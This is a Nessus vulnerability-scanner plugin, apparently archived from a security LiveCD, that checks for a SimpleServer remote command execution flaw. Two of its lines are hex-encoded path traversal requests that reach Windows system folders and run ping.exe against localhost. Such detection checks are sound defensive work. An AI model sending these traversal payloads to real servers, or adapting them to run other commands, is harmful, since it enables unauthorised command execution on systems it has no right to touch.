home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / simplewww.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  96 lines

  1. #
  2. # This script was written by Mathieu Meadele <mm@omnix.net>
  3. #
  4. # Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
  5. #      Erik Anderson <eanders@carmichaelsecurity.com>
  6. #      Added BugtraqID
  7. #
  8. # (minor changes by rd)
  9. #
  10.  
  11.  
  12. if(description)
  13. {
  14.  script_id(10705);
  15.  script_bugtraq_id(3112);
  16.  script_version ("$Revision: 1.12 $");
  17.  name["english"]  = "SimpleServer remote execution";
  18.  name["francais"] = "SimpleServer execution de commandes a distance";
  19.  
  20.  script_name(english:name["english"], francais:name["francais"]);
  21.  
  22.  desc["english"] ="
  23. By sending a specially encoded string to the remote server,
  24. it is possible to execute remote commands with the 
  25. privileges of the server.
  26.  
  27. Solution: Upgrade SimpleServer to version 1.15.
  28. Risk factor : High";
  29.  
  30.  script_description(english:desc["english"]);
  31.  
  32.  summary["english"] = "Check the remote execution vulnerability in SimpleServer";
  33.  
  34.  script_summary(english:summary["english"]);
  35.  
  36.  script_category(ACT_GATHER_INFO);
  37.  
  38.  script_copyright(english: "Mathieu Meadele <mm@omnix.net>");
  39.  
  40.  family["english"]  = "Gain root remotely";
  41.  family["francais"] = "Passer root α distance";
  42.  script_family(english:family["english"], francais:family["francais"]);
  43.  script_dependencie("find_service.nes");
  44.  script_require_ports("Services/www", 80);
  45.  exit(0);
  46. }
  47.  
  48. #  we are sending a hexadecimal encoded url, with the cgi-bin prefix,
  49. #  (even if this one doesn't exist), this allowing us to break out the root
  50. #  folder.
  51.  
  52. #  start here
  53.  
  54.  
  55. include("http_func.inc");
  56.  
  57. port = get_http_port(default:80);
  58.  
  59.  
  60. if(!get_port_state(port))exit(0);
  61.  
  62.  
  63.  match = "Reply from 127.0.0.1";
  64.  
  65.  strnt = http_get(item:string("/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1"),
  66.      port:port);
  67.  
  68.  str9x  = http_get(item:string("/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1"),
  69.      port:port);
  70.      
  71.  
  72. soc = http_open_socket(port);
  73. if(soc) 
  74. {
  75.   send(socket:soc, data:str9x);
  76.   inc1 = http_recv(socket:soc);
  77.   http_close_socket(soc);
  78.   if( match >< inc1 ) {
  79.      security_hole(port);
  80.      exit(0);
  81.      }
  82. }
  83.   
  84. soc = http_open_socket(port);
  85. if(soc)
  86. {
  87.   send(socket:soc, data:strnt);
  88.   inc2 = http_recv(socket:soc);
  89.   http_close_socket(soc);
  90.  
  91.   if( match >< inc2 ) {
  92.      security_hole(port);
  93.      }
  94.  }
  95.  
  96.